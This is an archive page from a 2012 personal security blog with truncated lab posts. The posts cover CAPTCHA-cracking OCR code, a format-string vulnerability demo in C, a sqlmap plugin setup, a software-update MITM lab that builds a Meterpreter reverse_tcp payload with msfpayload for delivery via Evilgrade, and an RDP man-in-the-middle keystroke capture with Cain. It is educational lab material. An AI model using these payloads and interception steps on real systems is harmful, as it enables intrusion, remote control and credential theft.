Posts

Showing posts from 2012

Forensic Challenge

This is my forensic challenge:

For 1: Find the password in: for1(2).zip
For 2: Analyze the network capture and find the password: google.pcap
For 3: Analyze the Windows memory and find the password of the backdoor: winxp_memory.img

------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Easy read captcha with Python

I needed to crack some easy captchas, so I wrote a script to do that. I used the PIL library to edit the images, converting the background to white and the characters to black. Pytesser is then used for OCR (Optical Character Recognition).

    from PIL import Image

    img = Image.open('a.jpeg')  # Your image here!
    img = img.convert("RGBA")
    width, height = img.size
    pixdata = img.load()

    # Make the letters bolder for easier recognition
    for y in range(img.size[1]):
        for x in range(img.size[0]):
            if pixdata[x, y][0] < 90:
                pixdata[x, y] = (0, 0, 0, 255)

    for y in range(img.size[1]):
        for x in range(img.size[0]):
            if pixdata[x, y][1] < 136:
                pixdata[x, y] = (0, 0, 0, 255)

    # Anything that still has a blue component becomes white background
    for y in range(img.size[1]):
        for x in range(img.size[0]):
            if pixdata[x, y][2] > 0:
                pixdata[x, y] = (255, 255, 255, 255)

    img.save("input-black.gif", "GIF")

    #   Make the image bigger (needed for OCR)
    im_orig = Image.

SQLite3 class in Python

For my work, I created a class that uses sqlite3 to manipulate a database:

    #!/usr/bin/python
    import sqlite3
    import sys

    class database:
        'Database sqlite3 class'

        def __init__(self, name):
            self.name = name
            self.create_database()

        def create_database(self):
            # Open (or create) the database file and keep a cursor
            self.conn = sqlite3.connect(self.name)
            self.c = self.conn.cursor()

        def query(self, query):
            # Execute a statement and commit the change
            try:
                r = self.c.execute(query)
                self.conn.commit()
                return r
            except sqlite3.Error as e:
                print("Error %s:" % e.args[0])
                sys.exit(1)

        def query2(self, query):
            # Execute a statement and return all rows
            try:
                self.c.execute(query)
                r = self.c.fetchall()
                return r
            except sqlite3.Error as e:
                print("Error %s:" % e.args[0])
                sys.exit(1)

        def check_database_exits(self,table_name):
            re = self.query2("SELECT name FROM sqlite_master WHERE type='

Python - Multithread to read one file

Today I am working with Python. I need to write a script that reads one file line by line and delivers each line to one thread for processing (10 threads in total). I wanted a solution, so I chose to work with threads and a queue. In Python, when a process is initialized, it is assigned a queue and works with that queue. We put data (in this case, a line) into the queue. Each process reads from the queue, so all processes can read one file without overlapping :D

    import threading
    from queue import Queue

    # Number of threads
    n_thread = 5
    # Create queue
    queue = Queue()

    class ThreadClass(threading.Thread):
        def __init__(self, queue):
            threading.Thread.__init__(self)
            # Assign thread working with queue
            self.queue = queue

        def run(self):
            while True:
                # Get job from queue
                host = self.queue.get()
                print(self.name + ":" + host)
                # Signal to the queue that the job is done
                self.queue.task_done()

    #Create number proce

Format String Attacks to manipulate information anywhere in memory

By manipulating programs that misuse printf and related functions, an attacker can read arbitrary information from memory and manipulate information anywhere in memory. So, an attacker can have complete control over the victim process.

The right way:

    printf("%s", buffer);

The wrong way:

    printf(buffer);

If the program is implemented the "wrong" way, an attacker can place input into the string that will be interpreted as a format string. So, an attacker can print memory and the stack. An easy way to understand this:

    #include <stdio.h>

    int main(void) {
        char user_input[100];
        char buffer[100];
        int x = 1;
        /* .... */
        /* get user input */
        /* ... */
        /* Oh, forgot the format string: the user input will be interpreted as the format */
        snprintf(buffer, sizeof buffer, user_input);
    }

The attacker enters "%x %x %x" into user_input, so the call becomes: snprintf(buffer, sizeof buffer, "%x %x %x");. And buffer now contains the next three hexadecimal values on the stack, so, we can rea

MySQLDumper Exploit


Sqlmap plugin for BurpSuite

Download the SQLmap plugin for BurpSuite at: http://code.google.com/p/gason/downloads/list

1 - Store it in the same folder as BurpSuite
2 - Use this command to start BurpSuite with the plugin (on Linux):

    java -classpath gason-0.9.5.:"burpsuite_v1.4.01.jar" burp.StartBurp

3 - On start, when you click the proxy tab / action, you will see "send to sqlmap"

Configure the web browser to use the BurpSuite proxy. Now you can use it:

1 - Send a request from the browser to BurpSuite
2 - Action / Send to SQLmap

In the SQLmap options, you must:

1 - Configure the SQLmap bin path
2 - Action
3 - Set options if you need them, then run

And this is the result:

Software Update MITM Exploit use Evilgrade and Ettercap

Many programs check for updates; sometimes updates are performed over SSL. Commonly, updates are delivered over HTTP, which can be manipulated. A modular exploit tool can spoof software update responses to deliver an executable of your choosing to the victim. In this lab, I used Evilgrade with Ettercap.

Your victim machine uses Notepad++ unstable:

1 - Unstable version
2 - Victim IP and DNS

Install Evilgrade on the Backtrack system:

1 - # cd /root
2 - # apt-get install libdata-dump-perl
3 - # wget http://isr-evilgrade.googlecode.com/files/isr-evilgrade-2.0.0.tar.gz
4 - # tar xfz isr-evilgrade-2.0.0.tar.gz
5 - # cd isr-evilgrade

Prepare the Meterpreter executable to deliver to the victim:

1 - # ifconfig eth0
    Get your Backtrack IP address
2 - # cd /root/isr-evilgrade/agent/
    Go to the evilgrade agent directory
3 - # /opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.174.132 LPORT=8080 X > agent.exe
    Create the Meterpreter executable
4 - # ls
    Verify agent.exe

1 -

RDP Man in The Middle

Remote Desktop Protocol (RDP) is used in most Windows environments. It is often vulnerable to man-in-the-middle attacks. You can decrypt a session to reveal keystrokes. Today, we will demo this.

Note: Newer RDP versions can employ a certificate and TLS encryption, but self-signed certs are often used. And Cain is the only tool we know of that can attack RDP (even with TLS).

You need three systems:

•    RDP server
•    RDP client (victim)
•    Attacker (running Cain on Windows XP)

Note:

•    No security suite (disable firewall)
•    Note the IP address of each
•    Install Cain & Abel, and accept all defaults except WinPcap

1.    On the RDP server system, create an admin user account:
      1 - Create an administrator account
      2 - Then add it to the Administrators group
      3 - Verify its creation

2.    Enable RDP on the RDP server system:
      1 - Right-click My Computer
      2 - Choose Properties
      3 - Choose the Remote tab
      4 - Check "Allow user to connect remotely to this computer". Click ok on Confirm

Install Backtrack 5 Login GUI

I like the Backtrack Gnome GUI, but I don't like its login screen. So, I installed a login GUI for Backtrack:

Install gdm:

    apt-get install gdm

Add gdm to startup: edit the file /etc/rc.local and add this (before the line: exit 0):

    /usr/sbin/gdm &

Reboot now.

If you want auto startx: http://kendyhikaru.blogspot.com/2012/04/backtrack-trick.html

Install Backtrack5 R3

An entry for my friend: install Backtrack5 R3. First, you need to create a bootable USB. I used Yumi:

Install Backtrack with your USB: